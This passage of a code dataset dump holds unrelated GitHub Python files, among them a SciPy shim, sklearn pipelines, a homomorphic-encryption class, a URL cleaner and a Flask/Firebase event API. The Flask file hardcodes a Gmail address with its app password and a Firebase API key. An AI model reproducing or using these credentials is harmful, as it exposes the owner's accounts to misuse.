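
assert camel_to_snake("preferredFirstName") == "preferred_first_name"
```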
Then sort \n intersections based on that frequency list.\n Then assign signal time based on the frequency\n \"\"\"\n res= []\n intersections = {k: list() for k in range(I)}\n\n for street in streets:\n intersections[street[1]].append(street[2])\n\n prio_streets_counter = Counter({})\n for p in car_paths:\n first_street = p[1:][0]\n prio_streets_counter[first_street] += 1\n prio_streets = [ k for (k, v) in prio_streets_counter.most_common() ]\n\n all_streets_counter = Counter({})\n for p in car_paths:\n for s in p[1:]:\n all_streets_counter[s] += 1\n all_streets = [ k for (k, v) in all_streets_counter.most_common() ]\n\n res.append(str(I))\n for intersection, istreets in intersections.items():\n if not istreets:\n continue\n new_istreets = sorted(\n istreets,\n key = lambda x: prio_streets.index(x) if x in prio_streets else 99999999999\n )\n res.append(str(intersection))\n res.append(str(len(new_istreets)))\n for istreet in new_istreets:\n # res.append(f\"{istreet} 1\")\n c = prio_streets_counter[istreet] if istreet in prio_streets_counter else 1\n res.append(f\"{istreet} {max(1, c)}\")\n # c = all_streets_counter[istreet] if istreet in all_streets_counter else 1\n # res.append(f\"{istreet} {max(1, c//5)}\")\n return \"\\n\".join(res)\n\n@timer\ndef helper():\n return \"bro\"\n","repo_name":"chip2n/hashcode-practice","sub_path":"qualifier/heur6.py","file_name":"heur6.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"27335754457","text":"class MyType(type):\n def __new__(mcls, name, bases, cls_dict):\n new_class = super().__new__(mcls, name, bases, cls_dict)\n return new_class\n\nclass Person(metaclass=MyType): ...\n\nclass SlottedStruct(type):\n def __new__(mcls, name, bases, class_dict):\n cls_object = super().__new__(mcls, name, bases, class_dict)\n\n setattr(cls_object, '__slots__', [f'_{field}' for field in cls_object._fields])\n\n for field in cls_object._fields:\n slot = f'_{field}'\n setattr(cls_object, field, property(fget=lambda self, attrib=slot: getattr(self, attrib)))\n\n def eq(self, other):\n if isinstance(other, cls_object):\n self_fields = [getattr(self, field) for field in cls_object._fields]\n other_fields = [getattr(other, field) for field in other._fields]\n return self_fields == other_fields\n return False\n setattr(cls_object, '__eq__', eq)\n\n def hash_(self):\n field_values = (getattr(self, field) for field in cls_object._fields)\n return hash(tuple(field_values))\n setattr(cls_object, '__hash__', hash_)\n\n def string_(self):\n field_values = (getattr(self, field) for field in cls_object._fields)\n field_values_joined = ', '.join(map(str, field_values))\n return f'{cls_object.__name__}({field_values_joined})'\n setattr(cls_object, '__str__', string_)\n\n","repo_name":"shawnmartin-py/python-snippets","sub_path":"unorganized/examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"38874087131","text":"# This file is not meant for public use and will be removed in SciPy v2.0.0.\n# Use the `scipy.signal` namespace for importing the functions\n# included below.\n\nimport warnings\nfrom . 
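The heuristic in the heur6.py record above rests on Counter.most_common() ordering plus a sort key that pushes unseen streets to the back. The trick in isolation:

```python
from collections import Counter

paths = [["a", "b"], ["a", "c"], ["b", "c"]]
prio = [s for s, _ in Counter(p[0] for p in paths).most_common()]  # ['a', 'b']
order = sorted(["c", "b", "a"], key=lambda s: prio.index(s) if s in prio else 10**9)
print(order)  # ['a', 'b', 'c'] -- frequent first streets first, unseen last
```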
import _signaltools\n\n__all__ = [  # noqa: F822\n    'correlate', 'correlation_lags', 'correlate2d',\n    'convolve', 'convolve2d', 'fftconvolve', 'oaconvolve',\n    'order_filter', 'medfilt', 'medfilt2d', 'wiener', 'lfilter',\n    'lfiltic', 'sosfilt', 'deconvolve', 'hilbert', 'hilbert2',\n    'cmplx_sort', 'unique_roots', 'invres', 'invresz', 'residue',\n    'residuez', 'resample', 'resample_poly', 'detrend',\n    'lfilter_zi', 'sosfilt_zi', 'sosfiltfilt', 'choose_conv_method',\n    'filtfilt', 'decimate', 'vectorstrength',\n    'timeit', 'cKDTree', 'dlti', 'upfirdn', 'linalg',\n    'sp_fft', 'lambertw', 'get_window', 'axis_slice', 'axis_reverse',\n    'odd_ext', 'even_ext', 'const_ext', 'cheby1', 'firwin'\n]\n\n\ndef __dir__():\n    return __all__\n\n\ndef __getattr__(name):\n    if name not in __all__:\n        raise AttributeError(\n            \"scipy.signal.signaltools is deprecated and has no attribute \"\n            f\"{name}. Try looking in scipy.signal instead.\")\n\n    warnings.warn(f\"Please use `{name}` from the `scipy.signal` namespace, \"\n                  \"the `scipy.signal.signaltools` namespace is deprecated.\",\n                  category=DeprecationWarning, stacklevel=2)\n\n    return getattr(_signaltools, name)\n","repo_name":"scipy/scipy","sub_path":"scipy/signal/signaltools.py","file_name":"signaltools.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":11925,"dataset":"github-code","pt":"57"}
{"seq_id":"41604431746","text":"import json\nd={\n    \"shopping_list\":\n    {   \n        \"chaco\":\"15\",\n        \"Biscuits\":\"50\",\n        \"Diary_milk\":\"30\",\n        \"ice_cream\":\"20\",\n    }   \n}\nuser1=input(\"enter what you want from this list : \")  \nuser2=int(input(\"Enter the quantity of \"))\n\nfor i in d:\n    \n    for j in d[i]:\n        if user1==j:\n            x=user2*int(d[i][j])\n            print(x)\nd[i].pop(user1)  \nuser=input(\"Enter a item : \")\nask=input(\"Enter value :\")\nd[i][user]=ask\n\nwith open(\"Q9.json\",\"w\") as h:\n    f=json.dump(d,h,indent=4)\n    print(f)\n\n\n\n\n\n\n\n","repo_name":"karuna131/PYTHON","sub_path":"python_json/Q9.py","file_name":"Q9.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"9813078450","text":"from multiprocessing import Manager, Process\nfrom typing import List, Optional, Union\n\nimport numpy as np\nimport tenseal as ts\n\n# always compute on the first split set\n\n\nclass Party1v1:\n    def __init__(self, s, n_split):\n        self.n = s.shape[0]\n        self.m = s.shape[1]\n        self.s: np.ndarray = s\n        self.context = None\n        self.s_split: Union[List[np.ndarray], List[ts.CKKSVector]] = [\n            t for t in np.hsplit(self.s, n_split)\n        ]\n        self.n_split = n_split\n\n    def compute_res_enc_split(\n        self, template_split_from_p2, n_threads, serialized_context_from_p2\n    ):\n        if n_threads > 1:  # the multiprocessing path only makes sense with more than one thread\n            return self._compute_res_enc_split_parallel(\n                template_split_from_p2, serialized_context_from_p2\n            )\n        return self._compute_res_enc_split_single(template_split_from_p2)\n\n    def _compute_res_enc_split_single(\n        self, template_split_from_p2: List[ts.CKKSVector]\n    ):\n        \"\"\"\n        Compute the enc result of the multiplication\n        :param template_split_from_p2: list of enc split vectors template from p2\n        :param n_split:\n        :return: result of the multiplication\n        \"\"\"\n\n        return sum(\n            [template_split_from_p2[i] @ self.s_split[i].T for i in range(self.n_split)]\n        )\n\n    def _compute_res_enc_split_parallel(\n        self, template_split_from_p2, serialized_context_from_p2\n    ):\n        \"\"\"\n        Function used to parallelize the matrix multiplication\n        Parameters\n        ----------\n        
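The signaltools.py record above is a PEP 562 deprecation shim: a module-level __getattr__ forwards old imports with a warning. The pattern reduced to a runnable sketch, with a hypothetical _new_home standing in for the real target module:

```python
# shim.py -- import this file as a module for __getattr__ to take effect (PEP 562)
import types
import warnings

_new_home = types.SimpleNamespace(medfilt=lambda x: x)  # hypothetical target
__all__ = ["medfilt"]

def __getattr__(name):
    if name not in __all__:
        raise AttributeError(f"module has no attribute {name}")
    warnings.warn(f"Please import {name} from its new home.",
                  category=DeprecationWarning, stacklevel=2)
    return getattr(_new_home, name)
```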
template_from_p2 : ts tensors list from P2\n\n Returns\n -------\n Partial encrypted result\n \"\"\"\n context_from_p2 = ts.context_from(serialized_context_from_p2)\n\n proc_array = []\n shared_list = Manager().list()\n for i in range(self.n_split):\n p = Process(\n target=self.__ex_matrix_mult,\n args=(template_split_from_p2[i], self.s_split[i].T, shared_list),\n )\n proc_array.append(p)\n for p in proc_array:\n p.start()\n\n for p in proc_array:\n p.join()\n\n part_res = list()\n # Deserialization\n for ser_ts in shared_list:\n part_res.append(ts.ckks_vector_from(context=context_from_p2, data=ser_ts))\n\n return sum(part_res)\n\n def __ex_matrix_mult(self, array_enc, mat, shared_res):\n \"\"\"\n target method for parallelization\n Parameters\n ----------\n array_enc : ts tensor\n mat : cleartext matrix\n shared_res : shared list for result\n\n Returns\n -------\n\n \"\"\"\n\n res = array_enc @ mat\n # The ts tensor needs to be serialized to be saved and passed between functions\n shared_res.append(res.serialize())\n","repo_name":"rtaiello/pp_image_registration","sub_path":"src/joint_computations/ckks/v1/party_1_v1.py","file_name":"party_1_v1.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"57"} +{"seq_id":"12398609608","text":"class Worker:\n def __init__(self, name: str):\n self.name = name\n print(\"Has been inited!\")\n\n def __call__(self, *args, **kwargs):\n self.age = args[0]\n print(\"has been called!\")\n\n\nif __name__ == \"__main__\":\n print(\"Let's start\")\n worker = Worker(\"Karim\")\n print(\"before call\")\n worker(41)\n print(\"##############\")\n","repo_name":"Karimai/ln_py","sub_path":"callable_obj.py","file_name":"callable_obj.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"24650437752","text":"from sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.externals import joblib\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import svm\nfrom sklearn import tree\n\n# Load and split the data\niris = load_iris()\nX_train, X_test, y_train, y_test = train_test_split(iris.data, iris.target, test_size=0.2, random_state=42)\n\n# Construct some pipelines\npipe_lr = Pipeline([('scl', StandardScaler()),\n ('pca', PCA(n_components=2)),\n ('clf', LogisticRegression(random_state=42))])\n\npipe_svm = Pipeline([('scl', StandardScaler()),\n ('pca', PCA(n_components=2)),\n ('clf', svm.SVC(random_state=42))])\n\npipe_dt = Pipeline([('scl', StandardScaler()),\n ('pca', PCA(n_components=2)),\n ('clf', tree.DecisionTreeClassifier(random_state=42))])\n\npipe_cart = Pipeline([('scl', StandardScaler()),\n ('pca', PCA(n_components=2)),\n ('clf', tree.DecisionTreeClassifier(criterion='gini', splitter='best', max_depth=None,\n min_samples_split=2, min_samples_leaf=1,\n min_weight_fraction_leaf=0.0, max_features=None,\n random_state=None, max_leaf_nodes=None,\n min_impurity_decrease=0.0, min_impurity_split=None,\n class_weight=None, presort=False))])\n\n# List of pipelines for ease of iteration\npipelines = [pipe_lr, pipe_svm, pipe_dt, pipe_cart]\n\n# Dictionary of pipelines and classifier types for ease of reference\npipe_dict = {0: 'Logistic Regression', 1: 'Support Vector Machine', 2: 'Decision Tree', 3: 'CART 
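Party1v1 in the record above relies on a block-matrix identity: splitting both operands into matching column blocks and summing the block products reproduces the full product exactly, which is why each split can be handled (and encrypted) independently. A plain-numpy check:

```python
import numpy as np

t = np.random.rand(1, 8)   # stand-in for the template vector
s = np.random.rand(4, 8)   # stand-in for party 1's matrix
blocks = sum(tb @ sb.T for tb, sb in zip(np.hsplit(t, 2), np.hsplit(s, 2)))
assert np.allclose(blocks, t @ s.T)  # block sum equals the full product
```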
Decision Tree'}\n\n# Fit the pipelines\nfor pipe in pipelines:\n    pipe.fit(X_train, y_train)\n\n# Compare accuracies\nfor idx, val in enumerate(pipelines):\n    print('%s pipeline test accuracy: %.3f' % (pipe_dict[idx], val.score(X_test, y_test)))\n\n# Identify the most accurate model on test data\nbest_acc = 0.0\nbest_clf = 0\nbest_pipe = ''\nfor idx, val in enumerate(pipelines):\n    if val.score(X_test, y_test) > best_acc:\n        best_acc = val.score(X_test, y_test)\n        best_pipe = val\n        best_clf = idx\nprint('Classifier with best accuracy: %s' % pipe_dict[best_clf])\n\n# Save pipeline to file\njoblib.dump(best_pipe, 'best_pipeline.pkl', compress=1)\nprint('Saved %s pipeline to file' % pipe_dict[best_clf])\n\ndotfile = open(\"C:\\\\Users\\\\Michael Del Rosario\\\\Desktop\\\\dtree2.dot\", 'w')\ntree.export_graphviz(pipelines[3]._final_estimator.tree_, out_file = dotfile)\ndotfile.close()","repo_name":"mikedelr/DeepLearningActivityRecognition","sub_path":"Test_Pipeline.py","file_name":"Test_Pipeline.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"5638254943","text":"def solution(name):\n    answer = 0\n\n    basis = 'ABCDEFGHIJKLMN'\n\n    current = 0\n\n    for i in range(len(name)) :\n        if name[i] == 'A' :\n            continue\n        \n        \n        # 왼/오 이동\n        answer += min(abs(i-current), len(name) - abs(i-current))\n        current = i\n        \n\n        if name[i] in basis :\n            answer += ord(name[i]) - 65\n        else :\n            answer += 91 - ord(name[i])\n        print(current, answer)\n\n    return answer\n\nprint(solution(\"ABAAAAAAAAABB\"))","repo_name":"jaenny/Algorithm_WinterStudy","sub_path":"jaenny/프로그래머스/조이스틱.py","file_name":"조이스틱.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"16006849045","text":"def solution(strs):\n    result = {}\n\n    for i in range(len(strs)):\n        result[1] = strs[i]\n        for j in range(i+1,len(strs)):\n            temp= strs[i:j]\n            if strs[j] not in temp:\n                if j-i+1 not in result:\n                    result[j-i+1] = strs[i:j+1]\n            else:\n                break\n\n    ansKey=max(result.keys())\n    ret=result[ansKey]\n\n    return ansKey\n\n\nif __name__ == '__main__':\n\n    strs = 'abcabcbb'\n\n    result = solution(strs)\n\n    print('result : ' + str(result))","repo_name":"jsw4215/algorithm_study","sub_path":"hashTable/longestSubstringWithoutRepeatingCharacters.py","file_name":"longestSubstringWithoutRepeatingCharacters.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"5108230794","text":"from cache_utils.decorators import cached\nimport re\nimport urllib\nimport urlparse\nimport requests\n\n\nclass Untiny(object):\n\n    SERVICES_URL = \"http://untiny.me/api/1.0/services/\"\n    EXTRACT_URL = \"http://untiny.me/api/1.0/extract/\"\n\n    @cached(60 * 60 * 24)  # Cache for 1 day\n    def get_services(self):\n        \"\"\"\n        Get a set of tiny URL services from untiny.me.\n        This set consists of domain names.\n        \"\"\"\n        try:\n            response = requests.get(\n                Untiny.SERVICES_URL,\n                params=dict(format=\"text\")\n            )\n        except requests.RequestException:\n            return set()\n\n        return set([s.strip() for s in response.text.split(',')])\n\n    def is_tiny(self, url):\n        \"\"\"\n        Check if the provided URL is tiny.\n        \"\"\"\n        return urlparse.urlsplit(url).netloc in self.get_services()\n\n    @cached(60 * 60 * 24)  # Cache for 1 day\n    def _do_extract(self, url):\n        try:\n            response = requests.get(\n                Untiny.EXTRACT_URL,\n                params=dict(\n                    
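One caveat on the Test_Pipeline.py record above: `from sklearn.externals import joblib` only exists on old scikit-learn releases; the standalone joblib package is the current route. Reloading the persisted winner might look like this sketch (X_test is assumed to come from the record's own split):

```python
from joblib import load  # modern replacement for sklearn.externals.joblib

best_pipe = load("best_pipeline.pkl")
# X_test as produced by the record's train_test_split
print(best_pipe.predict(X_test[:5]))
```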
format=\"text\",\n url=url,\n )\n )\n except requests.RequestException:\n return url\n return response.text\n\n def extract(self, url):\n \"\"\"\n Return an untinied version of the given URL.\n If the URL is not tiny it's returned unchanged.\n \"\"\"\n if not self.is_tiny(url):\n return url\n # The actual extraction is done in utility method so that\n # result is cached only if is_tiny() check has passed.\n return self._do_extract(url)\n\n\nclass URLFinder(object):\n\n URL_RE = re.compile('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', re.IGNORECASE)\n BLACKLIST_DOMAINS = set([\n \"instagr.am\",\n \"instagram.com\",\n \"yfrog.com\",\n \"foursquare.com\",\n \"www.facebook.com\",\n \"m.facebook.com\",\n \"twitter.com\",\n \"tmi.me\",\n \"m.tmi.me\",\n \"imgur.com\",\n \"twitter.yfrog.com\",\n \"twitpic.com\",\n \"pics.lockerz.com\",\n \"adf.ly\",\n \"businesstipsinfo.com\",\n \"marketingwebsitereview.info\",\n ])\n\n def __init__(self):\n self.untiny = Untiny()\n\n def _is_param_allowed(self, param, value):\n \"\"\"\n Check the query string parameter is allowed or should be removed.\n \"\"\"\n if param.startswith(\"utm_\"):\n return False\n if param == \"spref\" and value == \"tw\":\n return False\n return True\n\n def clean_params(self, url):\n \"\"\"\n Remove superfluous parameters from query string.\n \"\"\"\n if isinstance(url, unicode):\n url = url.encode(\"utf-8\")\n parts = list(urlparse.urlsplit(url))\n if not parts[3]:\n return url\n query = urlparse.parse_qsl(parts[3])\n query = [q for q in query if self._is_param_allowed(*q)]\n if query:\n parts[3] = urllib.urlencode(query)\n else:\n parts[3] = ''\n return urlparse.urlunsplit(parts).decode(\"utf-8\")\n\n def is_blacklisted(self, url):\n \"\"\"\n Check if the provided URL should be blacklisted.\n \"\"\"\n return urlparse.urlsplit(url).netloc in URLFinder.BLACKLIST_DOMAINS\n\n def follow_redirects(self, url):\n \"\"\"\n Follow all redirects from given URL. 
Return None if the final URL\n can't be accessed.\n \"\"\"\n try:\n return requests.get(url).url\n except requests.RequestException:\n return None\n\n def clean_url(self, url):\n \"\"\"\n Clean the given URL.\n \"\"\"\n if self.is_blacklisted(url):\n return None\n\n # If the URL was untinyfied we need to start over.\n extracted = self.untiny.extract(url)\n if extracted != url:\n return self.clean_url(extracted)\n\n redirects_to = self.follow_redirects(extracted)\n if not redirects_to:\n return None\n\n # If the URL redirects somewhere else we need to start over.\n if redirects_to != url:\n return self.clean_url(redirects_to)\n\n return self.clean_params(redirects_to)\n\n def find_urls(self, text):\n urls = set()\n\n for url in re.findall(self.URL_RE, text):\n if url not in urls:\n cleaned = self.clean_url(url)\n if cleaned:\n urls.add(cleaned)\n\n return urls\n\n\nurl_finder = URLFinder()\n","repo_name":"andreyfedoseev/djangourls.com","sub_path":"apps/trends/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"38974273548","text":"def dfs(series, length):\n if length == N:\n print(*series, sep='')\n quit()\n\n length += 1\n half_length = length // 2\n series.append(0)\n for n in range(1, 4):\n if series[-2] == n:\n continue\n\n series[-1] = n\n for l in range(1, half_length + 1):\n if series[-l:] == series[-2 * l: -l]:\n break\n else:\n dfs(series[:], length)\n\n\nN = int(input())\ndfs([1], 1)\n","repo_name":"leeholeo/Algorithm_study","sub_path":"high_study/week_14/2661_good_series.py","file_name":"2661_good_series.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"38472811821","text":"# be sure the file name start with 'test'\n# if you want to use test flags see pytest doc\nfrom brownie import SimpleStorage, accounts\n\n# ==============================================\n# we need to test when we deploy our smart contract, it start with 0 in retrieve() function\ndef test_deploy():\n # Arrange\n account=accounts[0]\n simple_storage=SimpleStorage.deploy({\"from\": account})\n # Act \n starting_value=simple_storage.retrieve()\n expected=0\n # Assert\n assert starting_value==expected\n \ndef test_updating_storage():\n # Arrange\n account=accounts[0];\n simple_storage=SimpleStorage.deploy({\"from\": account})\n # Act\n simple_storage.store(15,{\"from\":account})\n expected=15\n retrieve_value=simple_storage.retrieve()\n # Assert\n assert expected==retrieve_value\n","repo_name":"AbhishekSingh581/brownie_Simple_Storage","sub_path":"tests/test_simple_storage.py","file_name":"test_simple_storage.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"36139118402","text":"from django.shortcuts import render\n\nfrom .models import Contact\nfrom .forms import ContactForm\n\nfrom django.core.mail import send_mail\n\n# 发送邮件的说明\n# https://code.ziqiangxuetang.com/django/django-send-email.html\n\n# Create your views here.\n\ndef post_contact(request):\n\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if form.is_valid():\n\n msg = form.save(commit=False)\n msg.save()\n\n send_mail(msg.subject, msg.email + \"-----\" +msg.message, '760822901@qq.com',\n ['law@xqopen.cn'], fail_silently=False)\n\n return render(request, 
'lawBlog/contact.html',context={'postReturn': '提交成功'})\n else:\n return render(request, 'lawBlog/index.html')","repo_name":"maxlee12/Blog_django","sub_path":"blog/Contacts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"74493586738","text":"# Made using code adapted from: https://www.youtube.com/watch?v=sVwWEoDa_uY&list=PLs3IFJPw3G9Jwaimh5yTKot1kV5zmzupt&index=6\n# Made using code adapted from: https://github.com/The-Intrigued-Engineer/python_emails/blob/main/text_email.py\n# Made using code adapted from: https://www.codeitbro.com/send-email-using-python/\n\nfrom flask import Flask, request, jsonify\nimport pyrebase\nfrom flask_cors import CORS\nimport smtplib\nimport ssl\nimport qrcode\n\n############################################# DB and API configs############################################\n\n\napi = Flask(__name__)\nCORS(api)\n\n\nfirebaseConfig = {\n \"apiKey\": \"AIzaSyAasBeKh-JrdSSllz2GEg8YEvlimoBR2J8\",\n \"authDomain\": \"eventos-tec-2d13f.firebaseapp.com\",\n \"databaseURL\": \"https://eventos-tec-2d13f-default-rtdb.firebaseio.com\",\n \"projectId\": \"eventos-tec-2d13f\",\n \"storageBucket\": \"eventos-tec-2d13f.appspot.com\",\n \"messagingSenderId\": \"684230874738\",\n \"appId\": \"1:684230874738:web:422955e4291d765ee194eb\"\n}\n\nfb = pyrebase.initialize_app(firebaseConfig)\nbase = fb.database()\n\n############################################# SMTP ############################################\n\ndef enviarCorreoATodos(message):\n try:\n estudiantes = base.child(\"estudiante\").get()\n\n for estudiante in estudiantes.each():\n print(estudiante.val())\n enviarCorreo(estudiante.val()[\"correo\"], message)\n except Exception as e:\n print(e)\n\ndef enviarCorreo(email_to, message):\n img = qrcode.make('Some data here')\n type(img) # qrcode.image.pil.PilImage\n img.save(\"qrcode.png\")\n\n smtp_port = 587 # Standard secure SMTP port\n smtp_server = \"smtp.gmail.com\" # Google SMTP Server\n\n email_from = \"bibliotecmail@gmail.com\"\n # email_to = \"xxxxxxxxxx@gmail.com\"\n\n pswd = \"pubrnylofjmuqmff\"\n\n # Create context\n simple_email_context = ssl.create_default_context()\n\n try:\n # Connect to the server\n print(\"Connecting to server...\")\n TIE_server = smtplib.SMTP(smtp_server, smtp_port)\n TIE_server.starttls(context=simple_email_context)\n TIE_server.login(email_from, pswd)\n print(\"Connected to server :-)\")\n\n # Send the actual email\n print()\n print(f\"Sending email to - {email_to}\")\n TIE_server.sendmail(email_from, email_to, message)\n print(f\"Email successfully sent to - {email_to}\")\n\n # If there's an error, print it out\n except Exception as e:\n print(e)\n print(\"Error al enviar correo a: \", email_to)\n\n # Close the port\n finally:\n TIE_server.quit()\n\n\n############################################# Asociaciones ############################################\n\n# Esta función registra una asociación y su información en la DB\n# Primero revisa si una con el mismo id ya existía\n@api.route('/crear_asociacion', methods=[\"POST\"])\ndef crear_asociacion():\n data = request.get_json()\n asociacion_id = data[\"asociacion_id\"]\n nombre = data[\"nombre\"]\n\n nueva_asociacion = {\n \"asociacion_id\": asociacion_id,\n \"nombre\": nombre\n }\n\n try:\n # Valida si la asociación ya fue registrada \n asociaciones = base.child(\"asociacion\").get()\n for asociacion in asociaciones.each():\n 
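send_mail() in the views.py record above only works once the Django project settings point at an SMTP server. A settings.py sketch with placeholder values (none of these values come from the record):

```python
EMAIL_BACKEND = "django.core.mail.backends.smtp.EmailBackend"
EMAIL_HOST = "smtp.example.com"       # placeholder
EMAIL_PORT = 587
EMAIL_USE_TLS = True
EMAIL_HOST_USER = "user@example.com"  # placeholder
EMAIL_HOST_PASSWORD = "app-password"  # placeholder
```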
print(asociacion.val()[\"asociacion_id\"])\n if (asociacion.val()[\"asociacion_id\"] == asociacion_id):\n return jsonify({\"message\": \"Esta asociacion ya ha sido registrada\"})\n\n base.child(\"asociacion\").push(nueva_asociacion)\n return jsonify({\"message\": \"La asociacion se registró exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al agregar la asociacion\"})\n\n# Esta función es un get de todas las asociaciones\n@api.route('/get_asociaciones', methods=[\"POST\"])\ndef get_asociaciones():\n try:\n asociaciones = base.child(\"asociacion\").get().val()\n lista_asociaciones = list(asociaciones.values())\n return jsonify(lista_asociaciones)\n\n except:\n return jsonify({\"Hubo un error al consultar las asociaciones\"})\n \n# Esta función es un update de asociaciones\n@api.route('/update_asociacion', methods=[\"POST\"])\ndef update_asociacion():\n data = request.get_json()\n asociacion_id = data[\"asociacion_id\"]\n nombre = data[\"nombre\"]\n\n nueva_asociacion = {\n \"asociacion_id\": asociacion_id,\n \"nombre\": nombre\n }\n try:\n asociaciones = base.child(\"asociacion\").get()\n for asociacion in asociaciones.each():\n if (asociacion.val()[\"asociacion_id\"] == asociacion_id):\n if (nombre != \"\"):\n base.child(\"asociacion\").child(\n asociacion.key()).update({\"nombre\": nombre})\n \n message = \"Se actualizaron los datos de la asociacion: \"\n message = message + str(nueva_asociacion[\"asociacion_id\"])\n enviarCorreoATodos(message.encode('utf-8'))\n return jsonify({\"message\": \"La asociacion se actualizó exitosamente\"})\n\n return jsonify({\"message\": \"La asociacion no existe\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al actualizar La asociacion\"})\n\n# Esta función elimina una asociación\n@api.route('/delete_asociacion', methods=[\"POST\"])\ndef delete_asociacion():\n data = request.get_json()\n asociacion_id = data[\"asociacion_id\"]\n\n try:\n asociaciones = base.child(\"asociacion\").get()\n for asociacion in asociaciones.each():\n if (asociacion.val()[\"asociacion_id\"] == asociacion_id):\n base.child(\"asociacion\").child(asociacion.key()).remove()\n return jsonify({\"message\": \"La asociacion se eliminó exitosamente\"})\n\n return jsonify({\"message\": \"La asociacion no existe\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al eliminar La asociacion\"})\n\n############################################# Estudiantes ############################################\n\n# Esta función registra a un estudiante, primero revisa si uno con este carnet ya existía\n@api.route('/crear_estudiante', methods=[\"POST\"])\ndef crear_estudiante():\n data = request.get_json()\n carnet = data[\"carnet\"]\n nombre = data[\"nombre\"]\n asociacion_id = data[\"asociacion_id\"]\n tipo = data[\"tipo\"]\n correo = data[\"correo\"]\n contrasena = data[\"contrasena\"]\n\n nuevo_estudiante = {\n \"carnet\": carnet,\n \"nombre\": nombre,\n \"asociacion_id\": asociacion_id,\n \"tipo\": tipo,\n \"correo\": correo,\n \"contrasena\": contrasena\n }\n\n try:\n # Validates if the student has already been registered\n estudiantes = base.child(\"estudiante\").get()\n for estudiante in estudiantes.each():\n print(estudiante.val()[\"carnet\"])\n if (estudiante.val()[\"carnet\"] == carnet):\n return jsonify({\"message\": \"Este estudiante ya ha sido registrado\"})\n\n base.child(\"estudiante\").push(nuevo_estudiante)\n return jsonify({\"message\": \"El estudiante se registro exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un 
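Each route in the Flask/pyrebase record in progress here repeats the same linear scan over a node. A hypothetical helper (not in the record) built only from the pyrebase calls the record already uses (child / get / each / key / val):

```python
def find_by_field(node, field, value):
    """Return (key, record) for the first match in `node`, else (None, None)."""
    rows = base.child(node).get()
    for row in rows.each() or []:  # .each() may be None on an empty node
        if row.val().get(field) == value:
            return row.key(), row.val()
    return None, None

# e.g.: key, found = find_by_field("asociacion", "asociacion_id", asociacion_id)
```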
error al agregar al estudiante\"})\n\n# Esta función es un get de los estudiante\n@api.route('/get_estudiantes', methods=[\"POST\"])\ndef get_estudiantes():\n try:\n estudiantes = base.child(\"estudiante\").get().val()\n lista_estudiantes = list(estudiantes.values())\n return jsonify(lista_estudiantes)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar los estudiante\"})\n\n# Esta función actualiza la información de un estudiante\n@api.route('/update_estudiante', methods=[\"POST\"])\ndef update_estudiante():\n data = request.get_json()\n carnet = data[\"carnet\"]\n nombre = data[\"nombre\"]\n correo = data[\"correo\"]\n asociacion_id = data[\"asociacion_id\"]\n tipo = data[\"tipo\"]\n\n nuevo_estudiante = {\n \"carnet\": carnet,\n \"nombre\": nombre,\n \"correo\": correo,\n \"asociacion_id\": asociacion_id,\n \"tipo\": tipo\n\n }\n\n try:\n estudiantes = base.child(\"estudiante\").get()\n for estudiante in estudiantes.each():\n print(estudiante.val()[\"carnet\"])\n if (estudiante.val()[\"carnet\"] == carnet):\n if (nombre != \"\"):\n base.child(\"estudiante\").child(\n estudiante.key()).update({\"nombre\": nombre})\n if (correo != \"\"):\n base.child(\"estudiante\").child(\n estudiante.key()).update({\"correo\": correo})\n if (asociacion_id != \"\"):\n base.child(\"estudiante\").child(estudiante.key()).update(\n {\"asociacion_id\": asociacion_id})\n if (tipo != \"\"):\n base.child(\"estudiante\").child(estudiante.key()).update(\n {\"tipo\": tipo})\n \n return jsonify({\"message\": \"El estudiante se editó exitosamente\"})\n\n return jsonify({\"message\": \"Este estudiante no se ha encontrado\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al editar al estudiante\"})\n\n# Esta función elimina a un estudiante\n@api.route('/delete_estudiante', methods=[\"POST\"])\ndef delete_estudiante():\n data = request.get_json()\n carnet = data[\"carnet\"]\n\n try:\n estudiantes = base.child(\"estudiante\").get()\n for estudiante in estudiantes.each():\n 